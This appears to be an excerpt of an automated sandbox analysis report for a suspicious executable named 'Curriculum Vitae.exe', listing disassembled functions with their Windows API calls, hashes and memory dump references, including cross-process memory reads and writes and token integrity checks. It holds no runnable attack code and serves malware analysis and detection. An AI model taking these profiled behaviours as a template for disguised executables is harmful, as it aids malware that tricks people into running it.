                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: From$Prog$FreeStringTasklstrcmpi
                      • String ID:
                      • API String ID: 3897988419-0
                      • Opcode ID: ec66db748232ad0634981e2a1ee66987dabbeb7e8cac83f2402298e698d1f214
                      • Instruction ID: 0431c6189e45ae5b89d326cb7bf2e43f383dffea3d7fee0ca774de9b34270dbd
                      • Opcode Fuzzy Hash: ec66db748232ad0634981e2a1ee66987dabbeb7e8cac83f2402298e698d1f214
                      • Instruction Fuzzy Hash: EC017872610206AFDB118F68EC05FAA7EADEF48792F185124FA09D2210E771DD408BB0
                      Function 00D9E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                      Download Yara Rule
                      APIs
                      • QueryPerformanceCounter.KERNEL32(?), ref: 00D9E997
                      • QueryPerformanceFrequency.KERNEL32(?), ref: 00D9E9A5
                      • Sleep.KERNEL32(00000000), ref: 00D9E9AD
                      • QueryPerformanceCounter.KERNEL32(?), ref: 00D9E9B7
                      • Sleep.KERNEL32 ref: 00D9E9F3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: PerformanceQuery$CounterSleep$Frequency
                      • String ID:
                      • API String ID: 2833360925-0
                      • Opcode ID: 5f28a0e8d4d47d73a0c3e2fbada58dc67336f4310c37b7eb0c9d71ffff541db0
                      • Instruction ID: e13fbd8be9480574a7580650215aa01981a7b44f8a1c622d24dce5f507c3b124
                      • Opcode Fuzzy Hash: 5f28a0e8d4d47d73a0c3e2fbada58dc67336f4310c37b7eb0c9d71ffff541db0
                      • Instruction Fuzzy Hash: D0011731E0162AEBCF00EBE9DC59AEDFB78FB09701F050956E646B2241DB3099558BB1
                      Function 00D910F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D91114
                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00D90B9B,?,?,?), ref: 00D91120
                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00D90B9B,?,?,?), ref: 00D9112F
                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00D90B9B,?,?,?), ref: 00D91136
                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D9114D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 842720411-0
                      • Opcode ID: 56412a01054501777b424ac9cbfcba549139d31218250b3b6d1689c9527d9575
                      • Instruction ID: edaa61ac83f79de0a7f1748d3a28e673d75adf6f6e7dab021f054baf16c64f8e
                      • Opcode Fuzzy Hash: 56412a01054501777b424ac9cbfcba549139d31218250b3b6d1689c9527d9575
                      • Instruction Fuzzy Hash: 9401F679210306BFDB114BA5DC49E6A3B6EEF892A0B244419FA49D6360DB31DC019A70
                      Function 00D90FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D90FCA
                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D90FD6
                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D90FE5
                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D90FEC
                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D91002
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: HeapInformationToken$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 44706859-0
                      • Opcode ID: 6df00d2b392b1981ab5f2b6b8badafe40c9e714154aaf317014a7d08e6c40602
                      • Instruction ID: 218f957f45ed86106664da36adba0dc86e94945d21cb6e8adff6c865fbd8b411
                      • Opcode Fuzzy Hash: 6df00d2b392b1981ab5f2b6b8badafe40c9e714154aaf317014a7d08e6c40602
                      • Instruction Fuzzy Hash: 4CF04939210303ABDB214FA5AC4AF563BADFF89762F144414FA49C6351CA71DC40CA70
                      Function 00D91014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D9102A
                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D91036
                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D91045
                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D9104C
                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D91062
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: HeapInformationToken$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 44706859-0
                      • Opcode ID: 97d505ec84626bb51923cddec3b00858a914fa54a6f56762660c567733909ec2
                      • Instruction ID: 39ffef2b287b3d3788a09305ca2b2b01d5d17885d6e18865fce549f6f4998a93
                      • Opcode Fuzzy Hash: 97d505ec84626bb51923cddec3b00858a914fa54a6f56762660c567733909ec2
                      • Instruction Fuzzy Hash: C8F06D39210303EBDB215FA5EC4AF563BADFF897A1F140414FA49C7350CA71D8408A70
                      Function 00DA030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                      Download Yara Rule
                      APIs
                      • CloseHandle.KERNEL32(?,?,?,?,00DA017D,?,00DA32FC,?,00000001,00D72592,?), ref: 00DA0324
                      • CloseHandle.KERNEL32(?,?,?,?,00DA017D,?,00DA32FC,?,00000001,00D72592,?), ref: 00DA0331
                      • CloseHandle.KERNEL32(?,?,?,?,00DA017D,?,00DA32FC,?,00000001,00D72592,?), ref: 00DA033E
                      • CloseHandle.KERNEL32(?,?,?,?,00DA017D,?,00DA32FC,?,00000001,00D72592,?), ref: 00DA034B
                      • CloseHandle.KERNEL32(?,?,?,?,00DA017D,?,00DA32FC,?,00000001,00D72592,?), ref: 00DA0358
                      • CloseHandle.KERNEL32(?,?,?,?,00DA017D,?,00DA32FC,?,00000001,00D72592,?), ref: 00DA0365
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CloseHandle
                      • String ID:
                      • API String ID: 2962429428-0
                      • Opcode ID: ec3888ae5a733087e3969aa508f718b65a3aa36f8385ec5de800d780f1415ce0
                      • Instruction ID: b1c4f75ca0b3e1a1df5b4b6a7ca436b2b4bc561760a848666d74d94b264ecf2c
                      • Opcode Fuzzy Hash: ec3888ae5a733087e3969aa508f718b65a3aa36f8385ec5de800d780f1415ce0
                      • Instruction Fuzzy Hash: 4801AE72800B159FCB30AF66D880812FBF9BF613153198A3FD19652931C3B1A958DFA0
                      Function 00D6D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • _free.LIBCMT ref: 00D6D752
                        • Part of subcall function 00D629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000), ref: 00D629DE
                        • Part of subcall function 00D629C8: GetLastError.KERNEL32(00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000,00000000), ref: 00D629F0
                      • _free.LIBCMT ref: 00D6D764
                      • _free.LIBCMT ref: 00D6D776
                      • _free.LIBCMT ref: 00D6D788
                      • _free.LIBCMT ref: 00D6D79A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 16976078219b53ae9c84600bc8ada75c01f5e61d32e7fd17224426d0408ad0f6
                      • Instruction ID: 30560401ade46a9ff60c37eb5ab38f92cd483587d0d6b1f8e4b7ace31bdf3111
                      • Opcode Fuzzy Hash: 16976078219b53ae9c84600bc8ada75c01f5e61d32e7fd17224426d0408ad0f6
                      • Instruction Fuzzy Hash: 9EF01232B94748AB8625EB64FAC5C2677DEFB44751BA85806F449D7601CB30FC80CE75
                      Function 00D95C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 00D95C58
                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00D95C6F
                      • MessageBeep.USER32(00000000), ref: 00D95C87
                      • KillTimer.USER32(?,0000040A), ref: 00D95CA3
                      • EndDialog.USER32(?,00000001), ref: 00D95CBD
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                      • String ID:
                      • API String ID: 3741023627-0
                      • Opcode ID: 0bbe187f3da50715bd923f4270638ff549817383af39d73b3b46d3999161f560
                      • Instruction ID: e2e7ff58f21d410a672fcf4735150cd4c0c4384561ed9236bfb9de02160ef877
                      • Opcode Fuzzy Hash: 0bbe187f3da50715bd923f4270638ff549817383af39d73b3b46d3999161f560
                      • Instruction Fuzzy Hash: EC018630550B05ABEF215B10EE4EFA677B8FB00B05F041569E787A15E1DBF0A9848FB0
                      Function 00D622A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                      Download Yara Rule
                      APIs
                      • _free.LIBCMT ref: 00D622BE
                        • Part of subcall function 00D629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000), ref: 00D629DE
                        • Part of subcall function 00D629C8: GetLastError.KERNEL32(00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000,00000000), ref: 00D629F0
                      • _free.LIBCMT ref: 00D622D0
                      • _free.LIBCMT ref: 00D622E3
                      • _free.LIBCMT ref: 00D622F4
                      • _free.LIBCMT ref: 00D62305
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: fad8565cdb62d05057c609b34be1bb18735495e3d4b093f8b08b8fe657817570
                      • Instruction ID: b6b916bed622a01396b775bb2f797c7c798dcecba5ddf983b7ad8c18e2472d25
                      • Opcode Fuzzy Hash: fad8565cdb62d05057c609b34be1bb18735495e3d4b093f8b08b8fe657817570
                      • Instruction Fuzzy Hash: CEF05E70A50A658FC71AAF95BC019283BA4F7187A1B05554BF410F63B9CB3208A5FFF5
                      Function 00D495C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                      Download Yara Rule
                      APIs
                      • EndPath.GDI32(?), ref: 00D495D4
                      • StrokeAndFillPath.GDI32(?,?,00D871F7,00000000,?,?,?), ref: 00D495F0
                      • SelectObject.GDI32(?,00000000), ref: 00D49603
                      • DeleteObject.GDI32 ref: 00D49616
                      • StrokePath.GDI32(?), ref: 00D49631
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Path$ObjectStroke$DeleteFillSelect
                      • String ID:
                      • API String ID: 2625713937-0
                      • Opcode ID: f5c319dce524755abc9e91d25787d3a23c5e7ca62b7105325100999bfdab8408
                      • Instruction ID: fc2a0d48ab8b42edc6b4a4adb3bddeb583e4e4e2e9313cdb632f4d61430a7342
                      • Opcode Fuzzy Hash: f5c319dce524755abc9e91d25787d3a23c5e7ca62b7105325100999bfdab8408
                      • Instruction Fuzzy Hash: D4F01931005306EFDB125F67ED2CB653B61AB80362F588254F569A91F0C7328999DF30
                      Function 00D60F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: __freea$_free
                      • String ID: a/p$am/pm
                      • API String ID: 3432400110-3206640213
                      • Opcode ID: ba04c1dd9d4b420c78dec39ae2decf088c514a48f0bc0aede35a98a887dfa86a
                      • Instruction ID: b87a06bba6445d6aec4eaa8bad2383f0ef1ab32f9b9b7e4f91a793f05e4ea445
                      • Opcode Fuzzy Hash: ba04c1dd9d4b420c78dec39ae2decf088c514a48f0bc0aede35a98a887dfa86a
                      • Instruction Fuzzy Hash: C7D1F039900206DBDB289F68C856BFAB7B1FF16300F2C4259E946AB750D3759D80CBB5
                      Function 00DB61D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D50242: EnterCriticalSection.KERNEL32(00E0070C,00E01884,?,?,00D4198B,00E02518,?,?,?,00D312F9,00000000), ref: 00D5024D
                        • Part of subcall function 00D50242: LeaveCriticalSection.KERNEL32(00E0070C,?,00D4198B,00E02518,?,?,?,00D312F9,00000000), ref: 00D5028A
                        • Part of subcall function 00D500A3: __onexit.LIBCMT ref: 00D500A9
                      • __Init_thread_footer.LIBCMT ref: 00DB6238
                        • Part of subcall function 00D501F8: EnterCriticalSection.KERNEL32(00E0070C,?,?,00D48747,00E02514), ref: 00D50202
                        • Part of subcall function 00D501F8: LeaveCriticalSection.KERNEL32(00E0070C,?,00D48747,00E02514), ref: 00D50235
                        • Part of subcall function 00DA359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00DA35E4
                        • Part of subcall function 00DA359C: LoadStringW.USER32(00E02390,?,00000FFF,?), ref: 00DA360A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                      • String ID: x#$x#$x#
                      • API String ID: 1072379062-1894725482
                      • Opcode ID: 7e84e6af1bf802b658293e4a8099687caee5328d9b763665246e1f87e1743e6e
                      • Instruction ID: 92e9c0407dabdab98ce624159bf42b9526c0fd4bb0faab5272bcb21872a05ae2
                      • Opcode Fuzzy Hash: 7e84e6af1bf802b658293e4a8099687caee5328d9b763665246e1f87e1743e6e
                      • Instruction Fuzzy Hash: C0C14A71A00105EFDB24DF98C895EEEB7B9EF48300F148069E946AB291DB74E945CBB0
                      Function 00DB7B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D50242: EnterCriticalSection.KERNEL32(00E0070C,00E01884,?,?,00D4198B,00E02518,?,?,?,00D312F9,00000000), ref: 00D5024D
                        • Part of subcall function 00D50242: LeaveCriticalSection.KERNEL32(00E0070C,?,00D4198B,00E02518,?,?,?,00D312F9,00000000), ref: 00D5028A
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                        • Part of subcall function 00D500A3: __onexit.LIBCMT ref: 00D500A9
                      • __Init_thread_footer.LIBCMT ref: 00DB7BFB
                        • Part of subcall function 00D501F8: EnterCriticalSection.KERNEL32(00E0070C,?,?,00D48747,00E02514), ref: 00D50202
                        • Part of subcall function 00D501F8: LeaveCriticalSection.KERNEL32(00E0070C,?,00D48747,00E02514), ref: 00D50235
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                      • String ID: 5$G$Variable must be of type 'Object'.
                      • API String ID: 535116098-3733170431
                      • Opcode ID: fa641020582c72c3f1c953d03f2a69c374c4e4322d691e6cdf71659237013955
                      • Instruction ID: 4ecde2f70b94279537968d22c8cda5404252011270f7d6cf18d58ad48d82d0b8
                      • Opcode Fuzzy Hash: fa641020582c72c3f1c953d03f2a69c374c4e4322d691e6cdf71659237013955
                      • Instruction Fuzzy Hash: A4916974A04209EFCB14EF54D8919EDBBB1EF88300F148059F846AB292DB71AE85CB71
                      Function 00D92716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D9B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D921D0,?,?,00000034,00000800,?,00000034), ref: 00D9B42D
                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00D92760
                        • Part of subcall function 00D9B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D921FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00D9B3F8
                        • Part of subcall function 00D9B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00D9B355
                        • Part of subcall function 00D9B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00D92194,00000034,?,?,00001004,00000000,00000000), ref: 00D9B365
                        • Part of subcall function 00D9B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00D92194,00000034,?,?,00001004,00000000,00000000), ref: 00D9B37B
                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D927CD
                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D9281A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                      • String ID: @
                      • API String ID: 4150878124-2766056989
                      • Opcode ID: 44db225e8f72893d45239c52e0c39301d8f87ac7c2c8947ced80536e1829aea7
                      • Instruction ID: d2356356b609f7597f7d33314351baccb42417d025776b21f1e1dd637272e11b
                      • Opcode Fuzzy Hash: 44db225e8f72893d45239c52e0c39301d8f87ac7c2c8947ced80536e1829aea7
                      • Instruction Fuzzy Hash: CA412676900219BEDF10DBA4D982EEEBBB8EF09310F004099EA55B7191DA706E45CBB0
                      Function 00D6172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Curriculum Vitae.exe,00000104), ref: 00D61769
                      • _free.LIBCMT ref: 00D61834
                      • _free.LIBCMT ref: 00D6183E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _free$FileModuleName
                      • String ID: C:\Users\user\Desktop\Curriculum Vitae.exe
                      • API String ID: 2506810119-3591430144
